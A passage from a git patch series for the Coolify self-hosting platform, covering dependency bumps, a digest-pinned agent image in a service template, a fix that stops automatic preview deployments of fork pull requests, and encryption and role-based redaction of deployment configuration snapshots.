CAgICAgLSAnQUNUSVZFX1NUT1JBR0VfU0VSVklDRT0ke0FDVElWRV9TVE9SQUdFX1NFUlZJQ0U6LWxvY2FsfScKICAgIGNvbW1hbmQ6CiAgICAgIC0gYnVuZGxlCiAgICAgIC0gZXhlYwogICAgICAtIHNpZGVraXEKICAgICAgLSAnLUMnCiAgICAgIC0gY29uZmlnL3NpZGVraXEueW1sCiAgICB2b2x1bWVzOgogICAgICAtICdyYWlscy1kYXRhOi9hcHAvc3RvcmFnZScKICAgIGhlYWx0aGNoZWNrOgogICAgICB0ZXN0OgogICAgICAgIC0gQ01ELVNIRUxMCiAgICAgICAgLSAiYnVuZGxlIGV4ZWMgcmFpbHMgcnVubmVyICdwdXRzIFNpZGVraXEucmVkaXMoJjppbmZvKScgPiAvZGV2L251bGwgMj4mMSIKICAgICAgaW50ZXJ2YWw6IDMwcwogICAgICB0aW1lb3V0OiAxMHMKICAgICAgcmV0cmllczogMwogIHBvc3RncmVzOgogICAgaW1hZ2U6ICdwZ3ZlY3Rvci9wZ3ZlY3RvcjpwZzEyJwogICAgcmVzdGFydDogYWx3YXlzCiAgICB2b2x1bWVzOgogICAgICAtICdwb3N0Z3Jlcy1kYXRhOi92YXIvbGliL3Bvc3RncmVzcWwvZGF0YScKICAgIGVudmlyb25tZW50OgogICAgICAtICdQT1NUR1JFU19EQj0ke1BPU1RHUkVTX0RCOi1jaGF0d29vdH0nCiAgICAgIC0gUE9TVEdSRVNfVVNFUj0kU0VSVklDRV9VU0VSX1BPU1RHUkVTCiAgICAgIC0gUE9TVEdSRVNfUEFTU1dPUkQ9JFNFUlZJQ0VfUEFTU1dPUkRfUE9TVEdSRVMKICAgIGhlYWx0aGNoZWNrOgogICAgICB0ZXN0OgogICAgICAgIC0gQ01ELVNIRUxMCiAgICAgICAgLSAncGdfaXNyZWFkeSAtVSAkU0VSVklDRV9VU0VSX1BPU1RHUkVTIC1kIGNoYXR3b290IC1oIDEyNy4wLjAuMScKICAgICAgaW50ZXJ2YWw6IDMwcwogICAgICB0aW1lb3V0OiAxMHMKICAgICAgcmV0cmllczogNQogIHJlZGlzOgogICAgaW1hZ2U6ICdyZWRpczphbHBpbmUnCiAgICByZXN0YXJ0OiBhbHdheXMKICAgIGNvbW1hbmQ6CiAgICAgIC0gc2gKICAgICAgLSAnLWMnCiAgICAgIC0gJ3JlZGlzLXNlcnZlciAtLXJlcXVpcmVwYXNzICIkU0VSVklDRV9QQVNTV09SRF9SRURJUyInCiAgICB2b2x1bWVzOgogICAgICAtICdyZWRpcy1kYXRhOi9kYXRhJwogICAgaGVhbHRoY2hlY2s6CiAgICAgIHRlc3Q6CiAgICAgICAgLSBDTUQKICAgICAgICAtIHJlZGlzLWNsaQogICAgICAgIC0gJy1hJwogICAgICAgIC0gJFNFUlZJQ0VfUEFTU1dPUkRfUkVESVMKICAgICAgICAtIFBJTkcKICAgICAgaW50ZXJ2YWw6IDMwcwogICAgICB0aW1lb3V0OiAxMHMKICAgICAgcmV0cmllczogNQo=",
         "tags": [
             "chatwoot",
             "chat",
@@ -2024,7 +2024,7 @@
     "hermes-agent-with-webui": {
         "documentation": "https://github.com/nesquena/hermes-webui?utm_source=coolify.io",
         "slogan": "Hermes Agent \u2014 autonomous AI agent with persistent memory, scheduling, and a self-hosted web chat UI.",
-        "compose": "c2VydmljZXM6CiAgaGVybWVzLWFnZW50OgogICAgaW1hZ2U6ICdub3VzcmVzZWFyY2gvaGVybWVzLWFnZW50OnNoYS0yNzNmZjVjNGE0N2FmNDQ5OWJiZTVlM2IxMTM5ZWZkMzEzOTk1NTU0JwogICAgY29tbWFuZDogJ2dhdGV3YXkgcnVuJwogICAgZW52aXJvbm1lbnQ6CiAgICAgIC0gSEVSTUVTX0hPTUU9L2hvbWUvaGVybWVzLy5oZXJtZXMKICAgICAgLSBIRVJNRVNfVUlEPTEwMDAKICAgICAgLSBIRVJNRVNfR0lEPTEwMDAKICAgICAgLSAnT1BFTlJPVVRFUl9BUElfS0VZPSR7T1BFTlJPVVRFUl9BUElfS0VZfScKICAgICAgLSAnQU5USFJPUElDX0FQSV9LRVk9JHtBTlRIUk9QSUNfQVBJX0tFWX0nCiAgICAgIC0gJ09QRU5BSV9BUElfS0VZPSR7T1BFTkFJX0FQSV9LRVl9JwogICAgICAtICdHT09HTEVfQVBJX0tFWT0ke0dPT0dMRV9BUElfS0VZfScKICAgIHZvbHVtZXM6CiAgICAgIC0gJ2hlcm1lcy1ob21lOi9ob21lL2hlcm1lcy8uaGVybWVzJwogICAgICAtICdoZXJtZXMtYWdlbnQtc3JjOi9vcHQvaGVybWVzJwogICAgaGVhbHRoY2hlY2s6CiAgICAgIHRlc3Q6CiAgICAgICAgLSBDTUQtU0hFTEwKICAgICAgICAtICd0ZXN0IC1kIC9ob21lL2hlcm1lcy8uaGVybWVzIHx8IGV4aXQgMScKICAgICAgaW50ZXJ2YWw6IDEwcwogICAgICB0aW1lb3V0OiA1cwogICAgICByZXRyaWVzOiA1CiAgaGVybWVzLXdlYnVpOgogICAgaW1hZ2U6ICdnaGNyLmlvL25lc3F1ZW5hL2hlcm1lcy13ZWJ1aTowLjUxLjkyJwogICAgZGVwZW5kc19vbjoKICAgICAgLSBoZXJtZXMtYWdlbnQKICAgIGVudmlyb25tZW50OgogICAgICAtIFNFUlZJQ0VfRlFETl9IRVJNRVNXRUJVSV84Nzg3CiAgICAgIC0gSEVSTUVTX1dFQlVJX0hPU1Q9MC4wLjAuMAogICAgICAtIEhFUk1FU19XRUJVSV9QT1JUPTg3ODcKICAgICAgLSBIRVJNRVNfV0VCVUlfU1RBVEVfRElSPS9ob21lL2hlcm1lc3dlYnVpLy5oZXJtZXMvd2VidWkKICAgICAgLSBXQU5URURfVUlEPTEwMDAKICAgICAgLSBXQU5URURfR0lEPTEwMDAKICAgICAgLSAnSEVSTUVTX1dFQlVJX1BBU1NXT1JEPSR7U0VSVklDRV9QQVNTV09SRF9IRVJNRVNXRUJVSX0nCiAgICB2b2x1bWVzOgogICAgICAtICdoZXJtZXMtaG9tZTovaG9tZS9oZXJtZXN3ZWJ1aS8uaGVybWVzJwogICAgICAtICdoZXJtZXMtYWdlbnQtc3JjOi9ob21lL2hlcm1lc3dlYnVpLy5oZXJtZXMvaGVybWVzLWFnZW50OnJvJwogICAgICAtICdoZXJtZXMtd29ya3NwYWNlOi93b3Jrc3BhY2UnCiAgICBoZWFsdGhjaGVjazoKICAgICAgdGVzdDoKICAgICAgICAtIENNRAogICAgICAgIC0gY3VybAogICAgICAgIC0gJy1mJwogICAgICAgIC0gJ2h0dHA6Ly8xMjcuMC4wLjE6ODc4Ny9oZWFsdGgnCiAgICAgIGludGVydmFsOiAzMHMKICAgICAgdGltZW91dDogNXMKICAgICAgcmV0cmllczogMwo=",
+        "compose": "c2VydmljZXM6CiAgaGVybWVzLWFnZW50OgogICAgaW1hZ2U6ICdub3VzcmVzZWFyY2gvaGVybWVzLWFnZW50QHNoYTI1NjoyZjFmMmYxNzI1ZTVkYzlhNjFjZjZhMmRlYTVhY2E1MmE3NzZlYzRkMDIyY2IyOTY3OWU2YWEzZmYzMDNlNzdhJwogICAgY29tbWFuZDogJ2dhdGV3YXkgcnVuJwogICAgZW52aXJvbm1lbnQ6CiAgICAgIC0gSEVSTUVTX0hPTUU9L2hvbWUvaGVybWVzLy5oZXJtZXMKICAgICAgLSBIRVJNRVNfVUlEPTEwMDAKICAgICAgLSBIRVJNRVNfR0lEPTEwMDAKICAgICAgLSAnT1BFTlJPVVRFUl9BUElfS0VZPSR7T1BFTlJPVVRFUl9BUElfS0VZfScKICAgICAgLSAnQU5USFJPUElDX0FQSV9LRVk9JHtBTlRIUk9QSUNfQVBJX0tFWX0nCiAgICAgIC0gJ09QRU5BSV9BUElfS0VZPSR7T1BFTkFJX0FQSV9LRVl9JwogICAgICAtICdHT09HTEVfQVBJX0tFWT0ke0dPT0dMRV9BUElfS0VZfScKICAgIHZvbHVtZXM6CiAgICAgIC0gJ2hlcm1lcy1ob21lOi9ob21lL2hlcm1lcy8uaGVybWVzJwogICAgICAtICdoZXJtZXMtYWdlbnQtc3JjOi9vcHQvaGVybWVzJwogICAgaGVhbHRoY2hlY2s6CiAgICAgIHRlc3Q6CiAgICAgICAgLSBDTUQtU0hFTEwKICAgICAgICAtICd0ZXN0IC1kIC9ob21lL2hlcm1lcy8uaGVybWVzIHx8IGV4aXQgMScKICAgICAgaW50ZXJ2YWw6IDEwcwogICAgICB0aW1lb3V0OiA1cwogICAgICByZXRyaWVzOiA1CiAgaGVybWVzLXdlYnVpOgogICAgaW1hZ2U6ICdnaGNyLmlvL25lc3F1ZW5hL2hlcm1lcy13ZWJ1aTowLjUxLjkyJwogICAgZGVwZW5kc19vbjoKICAgICAgLSBoZXJtZXMtYWdlbnQKICAgIGVudmlyb25tZW50OgogICAgICAtIFNFUlZJQ0VfRlFETl9IRVJNRVNXRUJVSV84Nzg3CiAgICAgIC0gSEVSTUVTX1dFQlVJX0hPU1Q9MC4wLjAuMAogICAgICAtIEhFUk1FU19XRUJVSV9QT1JUPTg3ODcKICAgICAgLSBIRVJNRVNfV0VCVUlfU1RBVEVfRElSPS9ob21lL2hlcm1lc3dlYnVpLy5oZXJtZXMvd2VidWkKICAgICAgLSBXQU5URURfVUlEPTEwMDAKICAgICAgLSBXQU5URURfR0lEPTEwMDAKICAgICAgLSAnSEVSTUVTX1dFQlVJX1BBU1NXT1JEPSR7U0VSVklDRV9QQVNTV09SRF9IRVJNRVNXRUJVSX0nCiAgICB2b2x1bWVzOgogICAgICAtICdoZXJtZXMtaG9tZTovaG9tZS9oZXJtZXN3ZWJ1aS8uaGVybWVzJwogICAgICAtICdoZXJtZXMtYWdlbnQtc3JjOi9ob21lL2hlcm1lc3dlYnVpLy5oZXJtZXMvaGVybWVzLWFnZW50OnJvJwogICAgICAtICdoZXJtZXMtd29ya3NwYWNlOi93b3Jrc3BhY2UnCiAgICBoZWFsdGhjaGVjazoKICAgICAgdGVzdDoKICAgICAgICAtIENNRAogICAgICAgIC0gY3VybAogICAgICAgIC0gJy1mJwogICAgICAgIC0gJ2h0dHA6Ly8xMjcuMC4wLjE6ODc4Ny9oZWFsdGgnCiAgICAgIGludGVydmFsOiAzMHMKICAgICAgdGltZW91dDogNXMKICAgICAgcmV0cmllczogMwo=",
         "tags": [
             "ai",
             "agent",
diff --git a/versions.json b/versions.json
index 0c2bf23a2..9c9a405aa 100644
--- a/versions.json
+++ b/versions.json
@@ -10,7 +10,7 @@
             "version": "1.0.14"
         },
         "realtime": {
-            "version": "1.0.15"
+            "version": "1.0.16"
         },
         "sentinel": {
             "version": "0.0.21"

From 8dd5d01f690bd173faf4ec924ea48a1a117aa8c6 Mon Sep 17 00:00:00 2001
From: Andras Bacsai <5845193+andrasbacsai@users.noreply.github.com>
Date: Fri, 29 May 2026 15:37:42 +0200
Subject: [PATCH 44/90] Update bootstrap/helpers/shared.php

Co-authored-by: coderabbitai[bot] <136622811+coderabbitai[bot]@users.noreply.github.com>
---
 bootstrap/helpers/shared.php | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/bootstrap/helpers/shared.php b/bootstrap/helpers/shared.php
index 011c86744..c0425a3f0 100644
--- a/bootstrap/helpers/shared.php
+++ b/bootstrap/helpers/shared.php
@@ -361,7 +361,7 @@ function refreshSession(?Team $team = null): void
         }
         if (! $team) {
             // Fall back to any team the user still belongs to.
-            $team = User::find(Auth::id())->teams()->first();
+            $team = User::query()->find(Auth::id())?->teams()->first();
         }
     }
 

From 3ef05dd5ec503e061f182f34d51402e23c886b12 Mon Sep 17 00:00:00 2001
From: "dependabot[bot]" <49699333+dependabot[bot]@users.noreply.github.com>
Date: Fri, 29 May 2026 15:37:38 +0000
Subject: [PATCH 45/90] chore(deps): bump ws from 8.19.0 to 8.20.1 in
 /docker/coolify-realtime

Bumps [ws](https://github.com/websockets/ws) from 8.19.0 to 8.20.1.
- [Release notes](https://github.com/websockets/ws/releases)
- [Commits](https://github.com/websockets/ws/compare/8.19.0...8.20.1)

---
updated-dependencies:
- dependency-name: ws
  dependency-version: 8.20.1
  dependency-type: direct:production
...

Signed-off-by: dependabot[bot] <support@github.com>
---
 docker/coolify-realtime/package-lock.json | 8 ++++----
 docker/coolify-realtime/package.json      | 2 +-
 2 files changed, 5 insertions(+), 5 deletions(-)

diff --git a/docker/coolify-realtime/package-lock.json b/docker/coolify-realtime/package-lock.json
index 5c6fa94aa..cdb29bffa 100644
--- a/docker/coolify-realtime/package-lock.json
+++ b/docker/coolify-realtime/package-lock.json
@@ -10,7 +10,7 @@
                 "cookie": "1.1.1",
                 "dotenv": "17.3.1",
                 "node-pty": "1.1.0",
-                "ws": "8.19.0"
+                "ws": "8.20.1"
             }
         },
         "node_modules/@xterm/addon-fit": {
@@ -70,9 +70,9 @@
             }
         },
         "node_modules/ws": {
-            "version": "8.19.0",
-            "resolved": "https://registry.npmjs.org/ws/-/ws-8.19.0.tgz",
-            "integrity": "sha512-blAT2mjOEIi0ZzruJfIhb3nps74PRWTCz1IjglWEEpQl5XS/UNama6u2/rjFkDDouqr4L67ry+1aGIALViWjDg==",
+            "version": "8.20.1",
+            "resolved": "https://registry.npmjs.org/ws/-/ws-8.20.1.tgz",
+            "integrity": "sha512-It4dO0K5v//JtTXuPkfEOaI3uUN87iYPnqo/ZzqCoG3g8uhA66QUMs/SrM0YK7/NAu+r4LMh/9dq2A7k+rHs+w==",
             "license": "MIT",
             "engines": {
                 "node": ">=10.0.0"
diff --git a/docker/coolify-realtime/package.json b/docker/coolify-realtime/package.json
index 25bf786a8..9128c0c3f 100644
--- a/docker/coolify-realtime/package.json
+++ b/docker/coolify-realtime/package.json
@@ -7,6 +7,6 @@
         "cookie": "1.1.1",
         "dotenv": "17.3.1",
         "node-pty": "1.1.0",
-        "ws": "8.19.0"
+        "ws": "8.20.1"
     }
 }

From ab4b2045d427badeb0f5bd2c3d0a509e9dd74bb7 Mon Sep 17 00:00:00 2001
From: ShadowArcanist <162910371+ShadowArcanist@users.noreply.github.com>
Date: Fri, 29 May 2026 23:40:47 +0530
Subject: [PATCH 46/90] fix(webhook): skip preview deployments for fork PRs
 when public previews are off

---
 app/Http/Controllers/Webhook/Github.php       | 38 +++++++++++++++++++
 app/Jobs/ProcessGithubPullRequestWebhook.php  | 13 ++++++-
 .../project/application/advanced.blade.php    |  2 +-
 3 files changed, 51 insertions(+), 2 deletions(-)

diff --git a/app/Http/Controllers/Webhook/Github.php b/app/Http/Controllers/Webhook/Github.php
index b481f4a67..8e3ffcd7c 100644
--- a/app/Http/Controllers/Webhook/Github.php
+++ b/app/Http/Controllers/Webhook/Github.php
@@ -62,6 +62,7 @@ public function manual(Request $request)
                 $before_sha = data_get($payload, 'before');
                 $after_sha = data_get($payload, 'after', data_get($payload, 'pull_request.head.sha'));
                 $author_association = data_get($payload, 'pull_request.author_association');
+                $is_fork_pull_request = $this->isForkPullRequest($payload);
             }
             if (! in_array($x_github_event, ['push', 'pull_request'])) {
                 return response("Nothing to do. Event '$x_github_event' is not supported.");
@@ -222,6 +223,7 @@ public function manual(Request $request)
                             commitSha: data_get($payload, 'pull_request.head.sha', 'HEAD'),
                             authorAssociation: $author_association,
                             fullName: $full_name,
+                            isForkPullRequest: $is_fork_pull_request ?? false,
                         );
 
                         $return_payloads->push([
@@ -303,6 +305,7 @@ public function normal(Request $request)
                 $before_sha = data_get($payload, 'before');
                 $after_sha = data_get($payload, 'after', data_get($payload, 'pull_request.head.sha'));
                 $author_association = data_get($payload, 'pull_request.author_association');
+                $is_fork_pull_request = $this->isForkPullRequest($payload);
             }
             if (! in_array($x_github_event, ['push', 'pull_request'])) {
                 return response("Nothing to do. Event '$x_github_event' is not supported.");
@@ -434,6 +437,7 @@ public function normal(Request $request)
                             commitSha: data_get($payload, 'pull_request.head.sha', 'HEAD'),
                             authorAssociation: $author_association,
                             fullName: $full_name,
+                            isForkPullRequest: $is_fork_pull_request ?? false,
                         );
 
                         $return_payloads->push([
@@ -451,6 +455,40 @@ public function normal(Request $request)
         }
     }
 
+    /**
+     * Determine whether a pull_request webhook payload originates from a fork.
+     *
+     * GitHub's `author_association` is not a reliable trust signal (it grants
+     * CONTRIBUTOR to anyone who has merely opened an issue/PR before), so fork
+     * detection is gated on whether the PR crosses repository boundaries.
+     *
+     * The repository id comparison is the canonical signal; the `head.repo.fork`
+     * flag and a case-insensitive full_name comparison are fallbacks for payloads
+     * where the ids are unavailable (e.g. a deleted head repository).
+     */
+    private function isForkPullRequest(mixed $payload): bool
+    {
+        $headRepoId = data_get($payload, 'pull_request.head.repo.id');
+        $baseRepoId = data_get($payload, 'pull_request.base.repo.id');
+
+        if ($headRepoId !== null && $baseRepoId !== null) {
+            return (string) $headRepoId !== (string) $baseRepoId;
+        }
+
+        if (data_get($payload, 'pull_request.head.repo.fork') === true) {
+            return true;
+        }
+
+        $headRepoFullName = data_get($payload, 'pull_request.head.repo.full_name');
+        $baseRepoFullName = data_get($payload, 'pull_request.base.repo.full_name');
+
+        if (is_string($headRepoFullName) && is_string($baseRepoFullName)) {
+            return Str::lower($headRepoFullName) !== Str::lower($baseRepoFullName);
+        }
+
+        return false;
+    }
+
     public function redirect(Request $request)
     {
         $code = (string) $request->query('code', '');
diff --git a/app/Jobs/ProcessGithubPullRequestWebhook.php b/app/Jobs/ProcessGithubPullRequestWebhook.php
index 54e386676..141351784 100644
--- a/app/Jobs/ProcessGithubPullRequestWebhook.php
+++ b/app/Jobs/ProcessGithubPullRequestWebhook.php
@@ -39,6 +39,7 @@ public function __construct(
         public string $commitSha,
         public ?string $authorAssociation,
         public string $fullName,
+        public bool $isForkPullRequest = false,
     ) {
         $this->onQueue('high');
     }
@@ -92,7 +93,17 @@ private function handleOpenAction(Application $application, ?GithubApp $githubAp
 
         // Check if PR deployments from public contributors are restricted
         if (! $application->settings->is_pr_deployments_public_enabled) {
-            $trustedAssociations = ['OWNER', 'MEMBER', 'COLLABORATOR', 'CONTRIBUTOR'];
+            // Fork PRs carry untrusted code from a repository outside our control.
+            // GitHub's author_association cannot be trusted to gate these (it grants
+            // CONTRIBUTOR to anyone who has merely opened an issue/PR before), so fork
+            // PRs are never deployed automatically when public previews are off.
+            if ($this->isForkPullRequest) {
+                return;
+            }
+
+            // Same-repo (non-fork) branch PRs require push access to the base repo,
+            // so only trusted associations are allowed to trigger a deployment.
+            $trustedAssociations = ['OWNER', 'MEMBER', 'COLLABORATOR'];
             if (! in_array($this->authorAssociation, $trustedAssociations)) {
                 return;
             }
diff --git a/resources/views/livewire/project/application/advanced.blade.php b/resources/views/livewire/project/application/advanced.blade.php
index 82ee31933..d6fcc2e4a 100644
--- a/resources/views/livewire/project/application/advanced.blade.php
+++ b/resources/views/livewire/project/application/advanced.blade.php
@@ -41,7 +41,7 @@
                     instantSave id="isPreviewDeploymentsEnabled" label="Preview Deployments" canGate="update"
                     :canResource="$application" />
                 <x-forms.checkbox
-                    helper="When enabled, anyone can trigger PR deployments. When disabled, only repository members, collaborators, and contributors can trigger PR deployments."
+                    helper="When enabled, anyone can trigger PR deployments. When disabled, fork PRs are blocked and only repository owners, members, and collaborators can trigger PR deployments."
                     instantSave id="isPrDeploymentsPublicEnabled" label="Allow Public PR Deployments" canGate="update"
                     :canResource="$application" :disabled="!$isPreviewDeploymentsEnabled" />
 

From 84eb9d31bbbe3294f237f159df8e8f9b06fbea8f Mon Sep 17 00:00:00 2001
From: ShadowArcanist <162910371+ShadowArcanist@users.noreply.github.com>
Date: Sat, 30 May 2026 13:15:10 +0530
Subject: [PATCH 47/90] feat(ui): improve configuration changes modal

---
 app/Casts/EncryptedArrayCast.php              |  51 +++++++
 .../Project/Shared/ConfigurationChecker.php   |  43 +++++-
 app/Models/ApplicationDeploymentQueue.php     |  18 ++-
 .../ApplicationConfigurationSnapshot.php      | 134 ++++++++++++++++--
 .../Concerns/SummarizesDiffText.php           |  32 +++++
 .../ConfigurationDiff.php                     |  16 ---
 .../ConfigurationDiffer.php                   |  92 +++++++++++-
 ...ation_deployment_configuration_columns.php |  23 +++
 .../deployment/configuration-diff.blade.php   |  61 +++++++-
 .../shared/configuration-checker.blade.php    |   2 +-
 10 files changed, 426 insertions(+), 46 deletions(-)
 create mode 100644 app/Casts/EncryptedArrayCast.php
 create mode 100644 app/Services/DeploymentConfiguration/Concerns/SummarizesDiffText.php
 create mode 100644 database/migrations/2026_05_29_000000_encrypt_application_deployment_configuration_columns.php

diff --git a/app/Casts/EncryptedArrayCast.php b/app/Casts/EncryptedArrayCast.php
new file mode 100644
index 000000000..4f72c6286
--- /dev/null
+++ b/app/Casts/EncryptedArrayCast.php
@@ -0,0 +1,51 @@
+<?php
+
+namespace App\Casts;
+
+use Illuminate\Contracts\Database\Eloquent\CastsAttributes;
+use Illuminate\Contracts\Encryption\DecryptException;
+use Illuminate\Database\Eloquent\Model;
+use Illuminate\Support\Facades\Crypt;
+
+/**
+ * Stores an array as an encrypted JSON string at rest. Tolerates legacy
+ * plaintext JSON rows written before the column was encrypted, so existing
+ * snapshots keep decoding instead of throwing.
+ *
+ * @implements CastsAttributes<array<mixed>|null, array<mixed>|null>
+ */
+class EncryptedArrayCast implements CastsAttributes
+{
+    /**
+     * @param  array<string, mixed>  $attributes
+     * @return array<mixed>|null
+     */
+    public function get(Model $model, string $key, mixed $value, array $attributes): ?array
+    {
+        if ($value === null || $value === '') {
+            return null;
+        }
+
+        try {
+            $value = Crypt::decryptString($value);
+        } catch (DecryptException) {
+            // Legacy plaintext JSON written before this column was encrypted.
+        }
+
+        $decoded = json_decode((string) $value, true);
+
+        return is_array($decoded) ? $decoded : null;
+    }
+
+    /**
+     * @param  array<string, mixed>  $attributes
+     */
+    public function set(Model $model, string $key, mixed $value, array $attributes): ?string
+    {
+        if ($value === null) {
+            return null;
+        }
+
+        return Crypt::encryptString(json_encode($value, JSON_THROW_ON_ERROR));
+    }
+}
diff --git a/app/Livewire/Project/Shared/ConfigurationChecker.php b/app/Livewire/Project/Shared/ConfigurationChecker.php
index d583e74e6..43bf3140b 100644
--- a/app/Livewire/Project/Shared/ConfigurationChecker.php
+++ b/app/Livewire/Project/Shared/ConfigurationChecker.php
@@ -21,8 +21,6 @@ class ConfigurationChecker extends Component
 
     public array $configurationDiff = [];
 
-    public array $groupedConfigurationChanges = [];
-
     public Application|Service|StandaloneRedis|StandalonePostgresql|StandaloneMongodb|StandaloneMysql|StandaloneMariadb|StandaloneKeydb|StandaloneDragonfly|StandaloneClickhouse $resource;
 
     public function getListeners(): array
@@ -50,21 +48,56 @@ public function refreshConfigurationChanges(): void
         $this->configurationChanged();
     }
 
+    /**
+     * Members must never see environment variable values, so redact every
+     * environment-section change before it is serialized to the browser.
+     *
+     * @param  array<int, array<string, mixed>>  $changes
+     * @return array<int, array<string, mixed>>
+     */
+    private function redactEnvironmentChanges(array $changes, bool $redact): array
+    {
+        if (! $redact) {
+            return $changes;
+        }
+
+        return collect($changes)
+            ->map(function (array $change): array {
+                if (data_get($change, 'section') !== 'environment') {
+                    return $change;
+                }
+
+                $change['old_display_value'] = data_get($change, 'old_display_value') === '-' ? '-' : '••••••••';
+                $change['new_display_value'] = data_get($change, 'new_display_value') === '-' ? '-' : '••••••••';
+                $change['old_full_value'] = null;
+                $change['new_full_value'] = null;
+                $change['expandable'] = false;
+                $change['display_summary'] = data_get($change, 'type') === 'changed' ? 'Changed' : null;
+
+                return $change;
+            })
+            ->all();
+    }
+
     public function configurationChanged(): void
     {
         $this->resource->refresh();
 
         if ($this->resource instanceof Application) {
             $diff = $this->resource->pendingDeploymentConfigurationDiff();
+            // Fail closed: only owners/admins may see unlocked env values.
+            $redactEnvironment = ! (bool) auth()->user()?->isAdmin();
+
+            $array = $diff->toArray();
+            $array['changes'] = $this->redactEnvironmentChanges($array['changes'] ?? [], $redactEnvironment);
+
             $this->isConfigurationChanged = $diff->isChanged();
-            $this->configurationDiff = $diff->toArray();
-            $this->groupedConfigurationChanges = $diff->groupedChanges();
+            $this->configurationDiff = $array;
 
             return;
         }
 
         $this->isConfigurationChanged = $this->resource->isConfigurationChanged();
         $this->configurationDiff = [];
-        $this->groupedConfigurationChanges = [];
     }
 }
diff --git a/app/Models/ApplicationDeploymentQueue.php b/app/Models/ApplicationDeploymentQueue.php
index afac89fa8..53fb8337f 100644
--- a/app/Models/ApplicationDeploymentQueue.php
+++ b/app/Models/ApplicationDeploymentQueue.php
@@ -2,6 +2,7 @@
 
 namespace App\Models;
 
+use App\Casts\EncryptedArrayCast;
 use Illuminate\Database\Eloquent\Casts\Attribute;
 use Illuminate\Database\Eloquent\Model;
 use Illuminate\Support\Carbon;
@@ -74,11 +75,24 @@ class ApplicationDeploymentQueue extends Model
         'finished_at',
     ];
 
+    /**
+     * The configuration snapshot/diff hold full (decrypted on read) configuration,
+     * including unlocked environment variable values. They are only meant for the
+     * in-app diff modal (which redacts per role) and must never be serialized by the
+     * API, so hide them globally as defense in depth.
+     *
+     * @var array<int, string>
+     */
+    protected $hidden = [
+        'configuration_snapshot',
+        'configuration_diff',
+    ];
+
     protected $casts = [
         'pull_request_id' => 'integer',
         'finished_at' => 'datetime',
-        'configuration_snapshot' => 'array',
-        'configuration_diff' => 'array',
+        'configuration_snapshot' => EncryptedArrayCast::class,
+        'configuration_diff' => EncryptedArrayCast::class,
     ];
 
     public function application()
diff --git a/app/Services/DeploymentConfiguration/ApplicationConfigurationSnapshot.php b/app/Services/DeploymentConfiguration/ApplicationConfigurationSnapshot.php
index 8369f9a90..365708758 100644
--- a/app/Services/DeploymentConfiguration/ApplicationConfigurationSnapshot.php
+++ b/app/Services/DeploymentConfiguration/ApplicationConfigurationSnapshot.php
@@ -4,10 +4,13 @@
 
 use App\Models\Application;
 use App\Models\EnvironmentVariable;
+use App\Services\DeploymentConfiguration\Concerns\SummarizesDiffText;
 use Illuminate\Support\Arr;
 
 class ApplicationConfigurationSnapshot
 {
+    use SummarizesDiffText;
+
     public const SCHEMA_VERSION = 1;
 
     public function __construct(protected Application $application) {}
@@ -115,12 +118,14 @@ private function buildItems(): array
             $this->item('publish_directory', 'Publish directory', $this->application->publish_directory, 'build'),
             $this->item('install_command', 'Install command', $this->application->install_command, 'build'),
             $this->item('build_command', 'Build command', $this->application->build_command, 'build'),
-            $this->item('dockerfile', 'Dockerfile', $this->application->dockerfile, 'build', displayValue: $this->summarizeText($this->application->dockerfile)),
+            $this->item('dockerfile', 'Dockerfile', $this->application->dockerfile, 'build', displayValue: $this->summarizeText($this->application->dockerfile), displayFull: $this->application->dockerfile),
             $this->item('dockerfile_location', 'Dockerfile location', $this->application->dockerfile_location, 'build'),
             $this->item('dockerfile_target_build', 'Dockerfile target', $this->application->dockerfile_target_build, 'build'),
             $this->item('docker_compose_location', 'Docker Compose location', $this->application->docker_compose_location, 'build'),
-            $this->item('docker_compose', 'Docker Compose', $this->application->docker_compose, 'build', displayValue: $this->summarizeText($this->application->docker_compose)),
-            $this->item('docker_compose_raw', 'Raw Docker Compose', $this->application->docker_compose_raw, 'build', displayValue: $this->summarizeText($this->application->docker_compose_raw)),
+            // The generated docker_compose is intentionally excluded: it is re-rendered
+            // from git on every parse (resolved env, generated labels, deployment context),
+            // so comparing it would flag a permanent change for git-based compose apps.
+            $this->item('docker_compose_raw', 'Docker Compose', $this->application->docker_compose_raw, 'build', displayValue: $this->summarizeText($this->application->docker_compose_raw), displayFull: $this->application->docker_compose_raw, diffMode: 'lines'),
             $this->item('docker_compose_custom_build_command', 'Docker Compose custom build command', $this->application->docker_compose_custom_build_command, 'build'),
             $this->item('custom_docker_run_options', 'Custom Docker run options', $this->application->custom_docker_run_options, 'build'),
             $this->item('use_build_secrets', 'Use build secrets', data_get($this->application, 'settings.use_build_secrets'), 'build'),
@@ -162,9 +167,10 @@ private function domainItems(): array
     {
         return [
             $this->item('fqdn', 'Domains', $this->application->fqdn, 'redeploy'),
+            $this->item('docker_compose_domains', 'Service domains', $this->decodedComposeDomains(), 'redeploy', displayValue: $this->summarizeText($this->composeDomainsText()), displayFull: $this->composeDomainsText(), diffMode: 'lines'),
             $this->item('redirect', 'Redirect', $this->application->redirect, 'redeploy'),
-            $this->item('custom_labels', 'Container labels', $this->application->custom_labels, 'redeploy', displayValue: $this->summarizeText($this->application->custom_labels)),
-            $this->item('custom_nginx_configuration', 'Custom Nginx configuration', $this->application->custom_nginx_configuration, 'redeploy', displayValue: $this->summarizeText($this->application->custom_nginx_configuration)),
+            $this->item('custom_labels', 'Container labels', $this->application->custom_labels, 'redeploy', displayValue: $this->summarizeText($this->decodeCustomLabels($this->application->custom_labels)), displayFull: $this->decodeCustomLabels($this->application->custom_labels), diffMode: 'lines'),
+            $this->item('custom_nginx_configuration', 'Custom Nginx configuration', $this->application->custom_nginx_configuration, 'redeploy', displayValue: $this->summarizeText($this->application->custom_nginx_configuration), displayFull: $this->application->custom_nginx_configuration),
             $this->item('is_force_https_enabled', 'Force HTTPS', data_get($this->application, 'settings.is_force_https_enabled'), 'redeploy'),
             $this->item('is_gzip_enabled', 'Gzip', data_get($this->application, 'settings.is_gzip_enabled'), 'redeploy'),
             $this->item('is_stripprefix_enabled', 'Strip prefix', data_get($this->application, 'settings.is_stripprefix_enabled'), 'redeploy'),
@@ -234,6 +240,7 @@ private function limitItems(): array
     private function environmentItem(EnvironmentVariable $environmentVariable): array
     {
         $impact = $environmentVariable->is_buildtime ? 'build' : 'redeploy';
+        $locked = (bool) $environmentVariable->is_shown_once;
         $compareValue = [
             'value_hash' => $this->sensitiveHash($environmentVariable->value),
             'is_multiline' => $environmentVariable->is_multiline,
@@ -242,20 +249,62 @@ private function environmentItem(EnvironmentVariable $environmentVariable): arra
